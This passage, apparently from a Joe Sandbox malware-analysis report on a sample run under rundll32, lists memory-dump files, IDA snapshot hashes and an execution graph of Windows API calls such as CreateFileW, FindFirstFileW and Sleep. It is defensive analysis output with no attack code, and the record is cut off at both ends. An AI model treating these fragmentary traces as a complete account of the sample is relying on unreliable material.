                    • Associated: 00000006.00000002.2519796928.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000006.00000002.2519809504.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000006.00000002.2519822422.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000006.00000002.2519835323.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000006.00000002.2519848147.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000006.00000002.2519860000.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000006.00000002.2519875475.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000006.00000002.2519889646.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000006.00000002.2519906677.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000006.00000002.2519919818.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000006.00000002.2519941160.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000006.00000002.2520037611.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000006.00000002.2520053798.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000006.00000002.2520072262.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000006.00000002.2520088524.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000006.00000002.2520103731.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000006.00000002.2520119242.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000006.00000002.2520119242.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000006.00000002.2520152629.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000006.00000002.2520167683.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000006.00000002.2520182693.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000006.00000002.2520197392.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000006.00000002.2520211852.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000006.00000002.2520227967.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000006.00000002.2520242083.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000006.00000002.2520242083.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7a7d775f2f31171e9fdc6f9a2d88efd9136b6ab3ceaa150b0c732618665457cd
                    • Instruction ID: 43e2e41ca933135a76ff93088d0e918a0ccdcc9e2d3f64ee52f22439fc26371c
                    • Opcode Fuzzy Hash: 7a7d775f2f31171e9fdc6f9a2d88efd9136b6ab3ceaa150b0c732618665457cd
                    • Instruction Fuzzy Hash: B6F01736601A85DACB24DF36E8807D83764F75938CF50402AFA5D87B18DB34C69ACB40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000006.00000001.2182700301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00401000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_1_401000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5313ac8dcfd6aff18ad436b64c8517226814e4589e6c8eb98e893eb4249e838c
                    • Instruction ID: 1bc81c925e39cc1c392e4084ddf3db8ababac465a92711de055ded577be46b60
                    • Opcode Fuzzy Hash: 5313ac8dcfd6aff18ad436b64c8517226814e4589e6c8eb98e893eb4249e838c
                    • Instruction Fuzzy Hash: DCD0A720715E0B0BFB687AEE1CEE1361080D738206310003B9915D5293E9A8CC46924D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000006.00000001.2182700301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00401000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_1_401000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1e3586106831d5749ebdc5f2d497c5695c542f665bca583d4ac9db92e84bbac6
                    • Instruction ID: 1ed05d76bcfbe8ca552233208a9fcaacfb0212544dfc01b58dfcbfe2ce1027a5
                    • Opcode Fuzzy Hash: 1e3586106831d5749ebdc5f2d497c5695c542f665bca583d4ac9db92e84bbac6
                    • Instruction Fuzzy Hash: C9B0925072AD0C0B5BA8A6FF08EA27490D4D26C01A75010BFA419C63A2E98A48E88345
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000006.00000001.2182700301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00401000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_1_401000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a0cfa698748bb64cedbfea9c0ae8b152c64f619fa36b2ae3542f32198d6df4e9
                    • Instruction ID: 21ac2a481705a99f5833024b097cff2b5eb32e4b948c073529bab5dd0ea454cf
                    • Opcode Fuzzy Hash: a0cfa698748bb64cedbfea9c0ae8b152c64f619fa36b2ae3542f32198d6df4e9
                    • Instruction Fuzzy Hash: B5B09239468EC847CA02B734C94248A72B2FA90B08F800619F48692190ED2D9A2887C6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:4.8%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:0%
                    Total number of Nodes:1598
                    Total number of Limit Nodes:2
                    execution_graph 6472 815f10 6494 80c650 6472->6494 6476 815f64 6514 4111e0 6476->6514 6478 815f79 6479 81602c GetMessageW 6478->6479 6518 436960 6478->6518 6481 816041 6479->6481 6482 81601a 6479->6482 6542 40fec0 6481->6542 6482->6479 6483 815faa 6485 815fba Sleep 6483->6485 6487 436960 4 API calls 6485->6487 6488 815fd3 6487->6488 6488->6479 6489 815fd7 6488->6489 6526 80fc70 6489->6526 6546 40fde0 6494->6546 6496 80c667 6497 80c6ae 6496->6497 6550 411240 6496->6550 6499 4114b0 6497->6499 6500 4114e9 6499->6500 6501 4114cf 6499->6501 6500->6476 6502 4114eb 6501->6502 6503 4114dc 6501->6503 6505 411507 6502->6505 6506 40c4c0 TlsGetValue 6502->6506 6588 410430 6503->6588 6594 4106d0 6505->6594 6506->6505 6510 411538 6513 4106d0 TlsGetValue 6510->6513 6511 411521 6511->6510 6512 4106d0 TlsGetValue 6511->6512 6512->6510 6513->6500 6515 4111f4 6514->6515 6516 4100a0 TlsGetValue 6515->6516 6517 411202 6516->6517 6517->6478 6625 411140 6518->6625 6520 436973 GetFileAttributesW 6521 436989 6520->6521 6522 436a4e GetLastError 6520->6522 6523 4369a6 CreateFileW 6521->6523 6525 436993 6521->6525 6522->6525 6524 4369e1 CloseHandle 6523->6524 6523->6525 6524->6525 6525->6483 6527 80fc91 6526->6527 6627 80c6c0 6527->6627 6530 40fde0 TlsGetValue 6531 80fcd5 6530->6531 6532 815b40 6531->6532 6533 815b5e 6532->6533 6534 815b70 Sleep 6533->6534 6535 815b85 6534->6535 6536 410430 TlsGetValue 6535->6536 6537 815bc4 6536->6537 6859 80f6d0 6537->6859 6540 40fec0 TlsGetValue 6541 815c03 6540->6541 6541->6479 6543 40fee2 6542->6543 6544 40fecf 6542->6544 6544->6543 6545 40fde0 TlsGetValue 6544->6545 6545->6544 6547 40fdf0 6546->6547 6548 40fe19 6546->6548 6547->6548 6554 409120 6547->6554 6548->6496 6551 41124f 6550->6551 6569 4100a0 6551->6569 6555 40912a 6554->6555 6556 40912e 6554->6556 6555->6548 6556->6555 6558 4093f0 6556->6558 6561 409390 6558->6561 6560 409401 6560->6555 6562 4093a8 6561->6562 6564 4093bc 6562->6564 6565 419650 6562->6565 6564->6560 6566 419682 6565->6566 6567 41965d 6565->6567 6566->6564 6567->6566 6568 419672 TlsGetValue 6567->6568 6568->6566 6570 4100bf 6569->6570 6572 4100c6 6569->6572 6575 40fcb0 6570->6575 6573 40fde0 TlsGetValue 6572->6573 6574 4100f4 6573->6574 6574->6497 6576 40fcdc 6575->6576 6577 40fcbd 6575->6577 6576->6572 6578 40fcca 6577->6578 6585 40c4c0 6577->6585 6581 4090f0 6578->6581 6582 4090fa 6581->6582 6583 4090fe 6581->6583 6582->6576 6583->6582 6584 4093f0 TlsGetValue 6583->6584 6584->6582 6586 409390 TlsGetValue 6585->6586 6587 40c4d3 6586->6587 6587->6578 6589 41044b 6588->6589 6593 41045d 6588->6593 6592 40fcb0 TlsGetValue 6589->6592 6589->6593 6590 40fde0 TlsGetValue 6591 410498 6590->6591 6591->6500 6592->6593 6593->6590 6610 410610 6594->6610 6597 4113d0 6598 4113f3 6597->6598 6599 4113e6 6597->6599 6600 411451 6598->6600 6602 411401 6598->6602 6601 40fde0 TlsGetValue 6599->6601 6603 40fcb0 TlsGetValue 6600->6603 6607 4113ee 6601->6607 6604 411416 6602->6604 6605 40c4c0 TlsGetValue 6602->6605 6608 411458 6603->6608 6616 409150 6604->6616 6605->6604 6607->6511 6608->6607 6609 40fde0 TlsGetValue 6608->6609 6609->6607 6611 410662 6610->6611 6612 410625 6610->6612 6611->6597 6612->6611 6613 40fcb0 TlsGetValue 6612->6613 6614 41063a 6613->6614 6615 40fde0 TlsGetValue 6614->6615 6615->6611 6617 40915f 6616->6617 6621 409199 6616->6621 6618 409164 6617->6618 6619 40917e 6617->6619 6620 40917c 6618->6620 6624 4093f0 TlsGetValue 6618->6624 6619->6620 6622 4093f0 TlsGetValue 6619->6622 6620->6607 6621->6620 6623 4093f0 TlsGetValue 6621->6623 6622->6620 6623->6620 6624->6620 6626 41114c 6625->6626 6626->6520 6648 4346d0 6627->6648 6631 80c771 6632 411190 TlsGetValue 6631->6632 6633 80c823 6631->6633 6663 4116b0 6631->6663 6666 435df0 6631->6666 6632->6631 6670 417900 6633->6670 6642 40fec0 TlsGetValue 6643 80c90f 6642->6643 6644 40fde0 TlsGetValue 6643->6644 6645 80c918 6644->6645 6691 40fe30 6645->6691 6649 4346e4 6648->6649 6650 4113d0 TlsGetValue 6649->6650 6651 4346f1 6650->6651 6652 410b90 6651->6652 6653 410bb3 6652->6653 6654 410ba6 6652->6654 6655 410bfd 6653->6655 6657 410bc1 6653->6657 6656 40fe30 TlsGetValue 6654->6656 6695 40fd10 6655->6695 6660 410bae 6656->6660 6659 409150 TlsGetValue 6657->6659 6659->6660 6660->6631 6661 410c07 6661->6660 6662 40fe30 TlsGetValue 6661->6662 6662->6660 6701 410dc0 6663->6701 6667 435e09 6666->6667 6668 435e2c 6667->6668 6712 434200 6667->6712 6668->6631 6671 40fe80 SysFreeString 6670->6671 6672 417924 6671->6672 6683 41799a 6672->6683 6832 411060 6672->6832 6673 40fe80 SysFreeString 6675 4179a4 6673->6675 6684 4112c0 6675->6684 6676 417946 6677 417984 6676->6677 6678 417974 6676->6678 6680 40fe80 SysFreeString 6677->6680 6679 411060 2 API calls 6678->6679 6681 417982 6679->6681 6680->6681 6838 4104f0 6681->6838 6683->6673 6685 4112ce 6684->6685 6686 4100a0 TlsGetValue 6685->6686 6687 4112e8 6686->6687 6688 40fe80 6687->6688 6689 40fe94 SysFreeString 6688->6689 6690 40fea8 6688->6690 6689->6690 6690->6642 6692 40fe40 6691->6692 6693 40fe69 6691->6693 6692->6693 6694 409120 TlsGetValue 6692->6694 6693->6530 6694->6693 6696 40fd20 6695->6696 6700 40fd44 6695->6700 6697 40fd2d 6696->6697 6698 40c4c0 TlsGetValue 6696->6698 6699 4090f0 TlsGetValue 6697->6699 6698->6697 6699->6700 6700->6661 6702 410e39 6701->6702 6703 410ded 6701->6703 6704 410e66 6702->6704 6705 410e3f 6702->6705 6703->6702 6708 40c4c0 TlsGetValue 6703->6708 6707 40fcb0 TlsGetValue 6704->6707 6706 4113d0 TlsGetValue 6705->6706 6710 410e56 6706->6710 6707->6710 6708->6703 6709 410ef0 6709->6631 6710->6709 6711 40fde0 TlsGetValue 6710->6711 6711->6709 6715 440c20 6712->6715 6714 43422a 6714->6668 6716 440c52 6715->6716 6725 417be0 6716->6725 6721 410430 TlsGetValue 6722 440c9c 6721->6722 6723 40fec0 TlsGetValue 6722->6723 6724 440cac 6723->6724 6724->6714 6726 417c0d 6725->6726 6733 417c47 6725->6733 6727 417c17 6726->6727 6728 417c49 6726->6728 6737 413d70 6727->6737 6730 4111e0 TlsGetValue 6728->6730 6730->6733 6731 417c22 6732 4100a0 TlsGetValue 6731->6732 6732->6733 6734 437d50 6733->6734 6792 437d80 6734->6792 6738 413d80 6737->6738 6739 413d9a 6737->6739 6738->6739 6741 413d10 6738->6741 6739->6731 6742 413d26 6741->6742 6743 413d45 6741->6743 6745 415580 GetModuleFileNameW 6742->6745 6743->6739 6746 411240 TlsGetValue 6745->6746 6747 4155d4 6746->6747 6748 4111e0 TlsGetValue 6747->6748 6749 4155e1 6748->6749 6756 415350 6749->6756 6751 4155f2 6752 40fec0 TlsGetValue 6751->6752 6753 415627 6752->6753 6754 40fde0 TlsGetValue 6753->6754 6755 415630 6754->6755 6755->6743 6757 4153b6 6756->6757 6758 40fde0 TlsGetValue 6757->6758 6759 4153cc 6758->6759 6760 41546e 6759->6760 6762 4104b0 TlsGetValue 6759->6762 6761 40fec0 TlsGetValue 6760->6761 6763 41551f 6761->6763 6767 4153ea 6762->6767 6764 40fec0 TlsGetValue 6763->6764 6766 415531 6764->6766 6765 41542c 6768 414f80 14 API calls 6765->6768 6766->6751 6767->6765 6769 4117a0 TlsGetValue 6767->6769 6770 415446 6768->6770 6769->6765 6771 415473 6770->6771 6772 41544d 6770->6772 6775 414710 14 API calls 6771->6775 6773 415110 FindFirstFileW FindClose TlsGetValue 6772->6773 6774 415461 6773->6774 6776 410430 TlsGetValue 6774->6776 6777 415483 6775->6777 6776->6760 6778 415110 FindFirstFileW FindClose TlsGetValue 6777->6778 6779 415497 6778->6779 6780 410430 TlsGetValue 6779->6780 6781 4154a4 6780->6781 6782 4154e8 6781->6782 6783 4154b7 GetSystemDefaultUILanguage 6781->6783 6782->6760 6784 415230 FindFirstFileW FindClose GetUserDefaultUILanguage GetLocaleInfoW TlsGetValue 6782->6784 6785 414710 14 API calls 6783->6785 6786 415502 6784->6786 6787 4154c7 6785->6787 6788 410430 TlsGetValue 6786->6788 6789 415110 FindFirstFileW FindClose TlsGetValue 6787->6789 6788->6760 6790 4154db 6789->6790 6791 410430 TlsGetValue 6790->6791 6791->6782 6795 437dd0 6792->6795 6796 437e15 6795->6796 6798 437e62 6796->6798 6808 437bf0 6796->6808 6799 437eee 6798->6799 6806 437e79 6798->6806 6800 4100a0 TlsGetValue 6799->6800 6802 437d6c 6800->6802 6801 437ee1 6804 4113d0 TlsGetValue 6801->6804 6802->6721 6803 40fde0 TlsGetValue 6803->6806 6804->6802 6805 4113d0 TlsGetValue 6805->6806 6806->6801 6806->6803 6806->6805 6807 437bf0 50 API calls 6806->6807 6807->6806 6811 438220 6808->6811 6812 43829d 6811->6812 6818 438294 6811->6818 6813 40fec0 TlsGetValue 6812->6813 6814 439114 6813->6814 6815 40fde0 TlsGetValue 6814->6815 6816 437c15 6815->6816 6816->6798 6817 411240 TlsGetValue 6817->6818 6818->6812 6818->6817 6819 411190 TlsGetValue 6818->6819 6820 4113b0 TlsGetValue 6818->6820 6821 4111b0 TlsGetValue 6818->6821 6822 411290 TlsGetValue 6818->6822 6823 435980 TlsGetValue 6818->6823 6824 435950 TlsGetValue 6818->6824 6825 4359e0 TlsGetValue 6818->6825 6826 4359c0 TlsGetValue 6818->6826 6827 4381c0 TlsGetValue 6818->6827 6828 437b40 50 API calls 6818->6828 6829 435dd0 18 API calls 6818->6829 6830 435db0 18 API calls 6818->6830 6831 439be0 18 API calls 6818->6831 6819->6818 6820->6818 6821->6818 6822->6818 6823->6818 6824->6818 6825->6818 6826->6818 6827->6818 6828->6818 6829->6818 6830->6818 6831->6818 6833 411072 6832->6833 6837 411079 6832->6837 6848 40fdb0 6833->6848 6852 410c80 6837->6852 6839 4104fc 6838->6839 6844 410506 6838->6844 6840 410501 6839->6840 6841 410508 6839->6841 6842 40fe80 SysFreeString 6840->6842 6843 41051b 6841->6843 6846 410522 6841->6846 6842->6844 6845 40fe80 SysFreeString 6843->6845 6844->6683 6845->6844 6846->6844 6847 40fd90 TlsGetValue 6846->6847 6847->6844 6849 40fdd4 6848->6849 6850 40fdbb 6848->6850 6849->6837 6850->6849 6856 40fd90 6850->6856 6853 410ca3 6852->6853 6854 410c9a 6852->6854 6853->6676 6855 40fe80 SysFreeString 6854->6855 6855->6853 6857 409390 TlsGetValue 6856->6857 6858 40fda3 6857->6858 6858->6849 6860 80f751 6859->6860 6861 410430 TlsGetValue 6860->6861 6862 80f77b 6861->6862 6863 410430 TlsGetValue 6862->6863 6864 80f798 6863->6864 6865 410430 TlsGetValue 6864->6865 6866 80f7b2 6865->6866 6867 410430 TlsGetValue 6866->6867 6868 80f7cf 6867->6868 6869 410430 TlsGetValue 6868->6869 6870 80f7ec 6869->6870 6910 4104b0 6870->6910 6875 4104b0 TlsGetValue 6876 80f825 6875->6876 6918 7f7550 6876->6918 6878 80f833 6922 411580 6878->6922 6883 411580 TlsGetValue 6884 80f883 6883->6884 6951 7f76b0 6884->6951 6890 80f8b5 6891 4111e0 TlsGetValue 6890->6891 6892 80f8da 6891->6892 6893 411580 TlsGetValue 6892->6893 6894 80f8fa 6893->6894 6895 4111e0 TlsGetValue 6894->6895 6896 80f90f 6895->6896 6897 80f918 Sleep 6896->6897 6898 4116b0 TlsGetValue 6897->6898 6899 80f94c 6898->6899 7004 813400 6899->7004 6904 40fec0 TlsGetValue 6905 80f9a1 6904->6905 6906 40fec0 TlsGetValue 6905->6906 6907 80f9b3 6906->6907 6908 40fec0 TlsGetValue 6907->6908 6909 80f9c5 Sleep 6908->6909 6909->6540 6911 4104c5 6910->6911 6912 40fde0 TlsGetValue 6911->6912 6913 4104e0 6912->6913 6914 437200 6913->6914 6915 43721e 6914->6915 7019 448740 6915->7019 6919 7f756a 6918->6919 7026 7fd270 6919->7026 6921 7f7596 6921->6878 6923 4115b0 6922->6923 6924 41159e 6922->6924 6926 4115b8 6923->6926 6927 4115ca 6923->6927 6925 410430 TlsGetValue 6924->6925 6930 4115ab 6925->6930 6931 410430 TlsGetValue 6926->6931 6928 4115d7 6927->6928 6929 4115e9 6927->6929 6932 4114b0 TlsGetValue 6928->6932 6933 4115f2 6929->6933 6934 41167e 6929->6934 6943 80c9f0 6930->6943 6931->6930 6932->6930 6935 411621 6933->6935 6937 40c4c0 TlsGetValue 6933->6937 6936 410430 TlsGetValue 6934->6936 6939 40fcb0 TlsGetValue 6935->6939 6938 41168b 6936->6938 6937->6935 6940 4114b0 TlsGetValue 6938->6940 6941 411628 6939->6941 6940->6930 6942 40fde0 TlsGetValue 6941->6942 6942->6930 6944 80ca1e 6943->6944 7062 511af0 6944->7062 6946 80ca60 7067 5119a0 6946->7067 6948 80cad1 6949 40fec0 TlsGetValue 6948->6949 6950 80caf7 6949->6950 6950->6883 6952 7f78b0 50 API calls 6951->6952 6954 7f76d1 6952->6954 6953 511410 57 API calls 6955 7f773c 6953->6955 6956 440a70 33 API calls 6954->6956 6958 7f76eb 6954->6958 7136 7f77a0 6955->7136 6956->6958 6958->6953 6960 7f8ba0 6961 7f8bb9 6960->6961 6962 7f8be7 6961->6962 6964 440a70 33 API calls 6961->6964 6963 7f8c27 6962->6963 7451 7f8030 6962->7451 6966 7f78b0 6963->6966 6964->6962 6967 411b70 TlsGetValue 6966->6967 6968 7f78d9 6967->6968 6969 411b70 TlsGetValue 6968->6969 6974 7f78ec 6969->6974 6970 7f7e29 6971 460d30 50 API calls 6970->6971 6972 7f7e57 6971->6972 6973 411d20 14 API calls 6972->6973 6975 7f7ec2 6973->6975 6974->6970 6976 45e650 33 API calls 6974->6976 6979 7f7c41 6974->6979 6982 412220 18 API calls 6974->6982 6986 411d20 14 API calls 6974->6986 7000 7f4930 33 API calls 6974->7000 7002 7f48d0 33 API calls 6974->7002 7003 7f4830 46 API calls 6974->7003 6977 411d20 14 API calls 6975->6977 6976->6974 6978 7f7ed5 6977->6978 6978->6890 6980 413390 18 API calls 6979->6980 6981 7f7cea 6979->6981 6980->6981 8320 7f4930 6981->8320 6982->6974 6984 7f7d40 8324 7f48d0 6984->8324 6986->6974 6987 7f7d5c 6988 7f48d0 33 API calls 6987->6988 6989 7f7d78 6988->6989 6990 7f48d0 33 API calls 6989->6990 6991 7f7d94 6990->6991 6992 7f48d0 33 API calls 6991->6992 6993 7f7db0 6992->6993 6994 7f4930 33 API calls 6993->6994 6995 7f7dca 6994->6995 6996 7f4930 33 API calls 6995->6996 6997 7f7de4 6996->6997 6998 7f48d0 33 API calls 6997->6998 6999 7f7e00 6998->6999 6999->6970 8328 7f4830 6999->8328 7000->6974 7002->6974 7003->6974 7005 813421 7004->7005 7006 4116b0 TlsGetValue 7005->7006 7007 813451 7006->7007 7008 40fde0 TlsGetValue 7007->7008 7009 81348d 7008->7009 7010 40fec0 TlsGetValue 7009->7010 7011 80f970 7010->7011 7012 813c90 7011->7012 8334 40ff70 7012->8334 7015 420e80 7016 813cbf Sleep 7015->7016 7017 40fde0 TlsGetValue 7016->7017 7018 80f986 Sleep 7017->7018 7018->6904 7022 4117a0 7019->7022 7023 4117b2 7022->7023 7024 4100a0 TlsGetValue 7023->7024 7025 4117f1 7024->7025 7025->6875 7028 7fd292 7026->7028 7032 801c50 7028->7032 7029 7fd2b6 7035 7fd350 7029->7035 7031 7fd2c5 7031->6921 7039 4d3e50 7032->7039 7034 801c6d 7034->7029 7036 7fd376 7035->7036 7037 801c50 TlsGetValue 7036->7037 7038 7fd404 7036->7038 7037->7038 7038->7031 7040 4d3ea5 7039->7040 7041 4d3e5e 7039->7041 7042 4d3ead 7040->7042 7043 4d3eb3 7040->7043 7044 4d3ea3 7041->7044 7051 4d2750 7041->7051 7045 4d3ecb 7042->7045 7046 4d3eb1 7042->7046 7054 4d2fd0 7043->7054 7044->7034 7048 4093f0 TlsGetValue 7045->7048 7058 4d3040 7046->7058 7048->7044 7052 4090f0 TlsGetValue 7051->7052 7053 4d2766 7052->7053 7053->7044 7055 4d2fdb 7054->7055 7056 4d2fee 7055->7056 7057 4d2750 TlsGetValue 7055->7057 7056->7044 7057->7056 7060 4d304b 7058->7060 7059 4d305e 7059->7044 7060->7059 7061 4d2750 TlsGetValue 7060->7061 7061->7059 7070 511410 7062->7070 7064 511b1b 7074 511aa0 7064->7074 7066 511b2d 7066->6946 7068 511410 57 API calls 7067->7068 7069 5119cc 7068->7069 7069->6948 7071 511433 7070->7071 7078 5114c0 7071->7078 7073 511462 7073->7064 7075 511ab9 7074->7075 7076 511ae5 7075->7076 7126 50f310 7075->7126 7076->7066 7079 511515 7078->7079 7080 511618 7079->7080 7081 51154a 7079->7081 7122 436300 7080->7122 7101 436380 7081->7101 7084 51162b 7086 4374d0 2 API calls 7084->7086 7100 51160b 7084->7100 7085 410430 TlsGetValue 7088 5116c5 7085->7088 7089 51165a GetLastError 7086->7089 7087 51158c 7087->7100 7105 4374d0 7087->7105 7092 40fec0 TlsGetValue 7088->7092 7093 43ea00 3 API calls 7089->7093 7096 5116d5 7092->7096 7094 511679 7093->7094 7097 440c20 50 API calls 7094->7097 7096->7073 7097->7100 7098 5115de 7099 440c20 50 API calls 7098->7099 7099->7100 7100->7085 7102 4363e6 7101->7102 7103 436399 7101->7103 7102->7087 7104 43639e CreateFileW 7103->7104 7104->7102 7106 4374e9 7105->7106 7107 437520 7106->7107 7108 43750f 7106->7108 7110 43751e GetLastError 7107->7110 7111 4113d0 TlsGetValue 7107->7111 7109 4100a0 TlsGetValue 7108->7109 7109->7110 7116 43ea00 7110->7116 7112 43752e 7111->7112 7113 437536 GetFullPathNameW 7112->7113 7114 437556 7113->7114 7114->7110 7115 4113d0 TlsGetValue 7114->7115 7115->7110 7117 43ea32 FormatMessageW 7116->7117 7118 43ea2b 7116->7118 7119 43ea68 7117->7119 7118->7117 7120 4100a0 TlsGetValue 7119->7120 7121 43eaa1 LocalFree 7120->7121 7121->7098 7123 436316 7122->7123 7124 43636e 7122->7124 7123->7124 7125 436328 CreateFileW 7123->7125 7124->7084 7125->7124 7127 50f331 7126->7127 7130 50f351 7127->7130 7132 440a70 7127->7132 7128 50f39d 7128->7076 7130->7128 7131 440a70 33 API calls 7130->7131 7131->7130 7133 440a8e 7132->7133 7134 417be0 33 API calls 7133->7134 7135 440ab2 7134->7135 7135->7130 7137 7f78b0 50 API calls 7136->7137 7138 7f77c1 7137->7138 7139 440a70 33 API calls 7138->7139 7140 7f77dc 7138->7140 7139->7140 7141 440a70 33 API calls 7140->7141 7143 7f7811 7140->7143 7141->7143 7142 7f7753 7142->6960 7143->7142 7145 7f5cf0 7143->7145 7163 411b70 7145->7163 7150 7f603c 7190 411d20 7150->7190 7155 440a70 33 API calls 7158 7f5d61 7155->7158 7156 440a70 33 API calls 7156->7158 7157 7f4790 33 API calls 7157->7158 7158->7150 7158->7156 7158->7157 7159 7f47e0 33 API calls 7158->7159 7160 413390 18 API calls 7158->7160 7161 7f4700 46 API calls 7158->7161 7185 460bc0 7158->7185 7159->7158 7160->7158 7161->7158 7164 411bd0 7163->7164 7165 411b8a 7163->7165 7167 460d30 7164->7167 7165->7164 7196 411be0 7165->7196 7206 4645a0 7167->7206 7172 7f6d70 7173 7f6d9e 7172->7173 7383 413390 7173->7383 7175 413560 14 API calls 7176 7f5d48 7175->7176 7176->7155 7176->7158 7178 7f6de6 7179 7f6f62 7178->7179 7184 7f6fda 7178->7184 7386 7f4700 7178->7386 7180 7f6ffa 7179->7180 7182 7f6f8d 7179->7182 7181 413560 14 API calls 7180->7181 7181->7184 7183 413390 18 API calls 7182->7183 7183->7184 7184->7175 7392 462860 7185->7392 7187 460be3 7396 412ac0 7187->7396 7191 411ddf 7190->7191 7192 411d42 7190->7192 7191->7142 7192->7191 7193 411e20 14 API calls 7192->7193 7195 4093f0 TlsGetValue 7192->7195 7404 417420 7192->7404 7193->7192 7195->7192 7197 411bfb 7196->7197 7203 411c4b 7196->7203 7198 411c34 7197->7198 7199 411c12 7197->7199 7200 411cbc 7197->7200 7201 4093f0 TlsGetValue 7198->7201 7198->7203 7199->7198 7199->7203 7204 411c32 7199->7204 7202 411b70 TlsGetValue 7200->7202 7200->7203 7201->7203 7202->7200 7203->7165 7203->7203 7204->7203 7205 411be0 TlsGetValue 7204->7205 7205->7204 7207 4645b0 7206->7207 7208 4645c5 7206->7208 7209 440a70 33 API calls 7207->7209 7210 4645f4 7208->7210 7211 464360 18 API calls 7208->7211 7209->7208 7212 460d42 7210->7212 7217 461740 7210->7217 7211->7210 7214 464360 7212->7214 7256 412f60 7214->7256 7218 46176e 7217->7218 7219 440a70 33 API calls 7218->7219 7220 4617b3 7218->7220 7219->7220 7221 46181f 7220->7221 7222 4090f0 TlsGetValue 7220->7222 7229 4619a3 7220->7229 7223 4619a5 7221->7223 7224 46196c 7221->7224 7222->7221 7226 412ae0 14 API calls 7223->7226 7230 412ae0 7224->7230 7226->7229 7228 409120 TlsGetValue 7228->7229 7229->7212 7233 411e20 7230->7233 7232 412ae9 7232->7228 7234 411e40 7233->7234 7240 411eb4 7233->7240 7235 411e81 7234->7235 7236 411e4d 7234->7236 7235->7240 7241 411e9b 7235->7241 7250 411f60 7235->7250 7237 411e57 7236->7237 7252 411f21 7236->7252 7238 411e60 7237->7238 7239 411eaa 7237->7239 7238->7240 7244 411e72 7238->7244 7249 411ed7 7238->7249 7243 40fef0 TlsGetValue 7239->7243 7240->7232 7242 411f7a 7241->7242 7245 411ea8 7241->7245 7247 4093f0 TlsGetValue 7242->7247 7243->7240 7244->7242 7254 411e7f 7244->7254 7251 40fec0 TlsGetValue 7245->7251 7246 413560 14 API calls 7246->7250 7247->7240 7248 411d20 14 API calls 7248->7252 7249->7240 7253 411df0 TlsGetValue 7249->7253 7250->7240 7250->7246 7251->7240 7252->7240 7252->7248 7253->7249 7254->7240 7255 411e20 14 API calls 7254->7255 7255->7254 7257 412faf 7256->7257 7262 412fd5 7256->7262 7258 412fbd 7257->7258 7259 4093f0 TlsGetValue 7257->7259 7293 413560 7258->7293 7259->7258 7261 412fd0 7261->7150 7261->7172 7263 413057 7262->7263 7265 4093f0 TlsGetValue 7262->7265 7264 41306a 7263->7264 7266 4093f0 TlsGetValue 7263->7266 7267 41307f 7264->7267 7268 4131a9 7264->7268 7265->7263 7266->7264 7269 413092 7267->7269 7270 41318f 7267->7270 7271 4090f0 TlsGetValue 7268->7271 7299 412f00 7269->7299 7273 409150 TlsGetValue 7270->7273 7274 4131b2 7271->7274 7277 41314a 7273->7277 7281 41320f 7274->7281 7320 412750 7274->7320 7276 41314c 7278 413180 7276->7278 7280 412ae0 14 API calls 7276->7280 7277->7261 7286 412f60 18 API calls 7277->7286 7282 409150 TlsGetValue 7278->7282 7279 4130a3 7283 4090f0 TlsGetValue 7279->7283 7280->7278 7285 413560 14 API calls 7281->7285 7282->7277 7287 4130c8 7283->7287 7285->7277 7286->7277 7287->7277 7309 412920 7287->7309 7289 41310d 